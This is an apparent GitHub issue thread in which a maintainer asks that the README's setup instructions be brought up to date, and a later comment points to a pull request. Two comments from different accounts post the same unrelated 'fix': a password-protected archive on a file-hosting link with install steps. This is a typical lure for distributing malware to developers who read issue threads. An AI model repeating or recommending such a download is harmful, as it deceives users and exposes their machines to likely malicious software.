### ISSUE TITLE
Update the README with the most up-to-date setup informations 

### ISSUE THREAD

**Issue by expeditionengineer** [TUB-DVG/wissen-digital-ewb#2]
Currently the README.md doenst show the most up-to-date information on how to setup the project for development or production. That information should be updated from the documentation.

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by c0nb4** [comment]
@expeditionengineer  can you use this branch? https://github.com/TUB-DVG/wissen-digital-ewb/pull/1
